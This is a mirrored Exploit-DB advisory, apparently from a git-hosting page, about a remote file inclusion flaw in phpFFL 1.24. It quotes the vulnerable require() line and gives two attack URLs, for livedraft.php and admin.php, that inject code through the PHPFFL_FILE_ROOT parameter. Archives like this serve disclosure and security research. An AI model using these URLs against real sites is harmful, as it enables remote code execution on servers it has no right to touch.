bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/4406.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

22 lines
No EOL
1 KiB
Text
Raw Blame History

*******************************************************************************
# Title : phpFFL 1.24 Remote File Inclusion Vulnerability
*******************************************************************************
# Title : phpFFL 1.24 Remote File Inclusion Vulnerability
# Author : Dj7xpl
# Contact : Dj7xpl@r00t.ir
# Dawnload : http://sourceforge.net/project/showfiles.php?group_id=137531
# Gr33tZ : Y! Underground Group , Ir_R57 , Mehrdad AliZade
*******************************************************************************
Vuln Code:
require($PHPFFL_FILE_ROOT."program_files/livedraft/sajax.php");
require($PHPFFL_FILE_ROOT."program_files/livedraft/sajax.php");
[[Remote]]]
http://[target]/[path]/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=[ Evil Code ]
http://[target]/[path]/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=[ Evil Code ]
"""""""""""""""""""""
# milw0rm.com [2007-09-14]
Reference in a new issue View git blame Copy permalink